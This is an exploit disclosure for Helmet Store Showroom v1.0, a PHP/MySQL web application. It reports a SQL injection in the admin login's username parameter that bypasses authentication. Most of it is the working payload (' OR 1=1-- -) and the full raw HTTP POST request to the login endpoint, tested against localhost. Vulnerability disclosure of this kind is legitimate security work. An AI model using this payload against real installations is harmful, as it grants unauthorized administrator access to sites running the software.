# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection # Exploit Author: Ameer Hamza # Date: November 15, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code # Tested on: Kali Linux, Apache, Mysql # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account. [+] The username parameter is vulnerable to SQLi in login page [+] URL --> http://localhost/hss/admin/login.php [+] Username = ' OR 1=1-- - HTTP REQUEST POST /hss/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 38 Origin: http://localhost Connection: close Referer: http://localhost/hss/admin/login.php Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa username='+OR+1%3D1+--+-&password=1234